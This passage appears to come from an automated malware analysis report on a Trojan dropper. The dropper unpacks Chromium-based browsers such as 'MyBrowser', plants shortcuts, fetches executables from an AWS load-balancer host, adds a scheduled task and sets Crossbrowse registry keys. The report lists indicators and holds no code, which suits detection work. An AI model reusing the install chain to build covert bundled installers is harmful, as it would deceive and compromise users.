%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\chrome.7z (1161171 bytes)

The Trojan deletes the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (0 bytes)

The process setup.exe:240 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\id.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-CN.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\chrome.7z (1135976 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_elf.dll (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\splash-620x300.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-BR.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-TW.pak (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\secondarytile.png (637 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lv.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\uk.pak (1687 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nb.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bn.pak (1829 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fil.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sr.pak (1670 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\mr.pak (1802 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fi.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_32.nexe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\kn.pak (3668 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\natives_blob.bin (1685 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\te.pak (1862 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\it.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fr.pak (278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ml.pak (3734 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_child.dll (335724 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es-419.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\icudtl.dat (75554 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libegl.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ms.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sw.pak (238 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ko.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lt.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-US.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ru.pak (1673 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fa.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\da.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\el.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_watcher.dll (1657 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Quick Access\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ta.pak (3681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\de.pak (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sk.pak (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_200_percent.pak (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ar.pak (1629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\he.pak (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_64.nexe (23407 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sv.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\metro_driver.dll (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hi.pak (1809 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\45.0.2433.0.manifest (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\resources.pak (130562 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\vi.pak (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-PT.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Extensions\external_extensions.json (99 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome.dll (299767 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\snapshot_blob.bin (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\cs.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pl.pak (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (3700 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\delegate_execute.exe (3760 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\am.pak (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hr.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\et.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libglesv2.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ca.pak (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sl.pak (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ro.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl64.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\VisualElementsManifest.xml (401 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\th.pak (1788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hu.pak (274 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nl.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\tr.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\logo.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libexif.dll (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ja.pak (311 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-GB.pak (214 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium (0 bytes)

The process tmp24.tmp.exe:1492 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (16808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (274744 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (0 bytes)

The process nsj1B.tmp:1648 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6481.exe (14022 bytes)

The process dwwin.exe:2404 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\87D37.dmp (226144 bytes)

The process nsu5.tmp:468 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq21.tmp (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (13911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)

The process nssF.tmp:1668 makes changes in the file system.


The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp (0 bytes)

The process avg23.exe:1836 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188412 bytes)

The process %original file name%.exe:1364 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)

The process adv_128.exe:1660 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp25.tmp (718712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp24.tmp.exe (275838 bytes)

The process FlashPlayerUpdateService.exe:3536 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Adobe Flash Player Updater.job (830 bytes)

Registry activity

The process nsq18.tmp:1164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 3D F5 81 13 52 7B 6A BE 9C 65 3A 50 71 42 A2"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

The process 6471.exe:1916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\6548]
"setup.exe" = "MyBrowser Installer"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
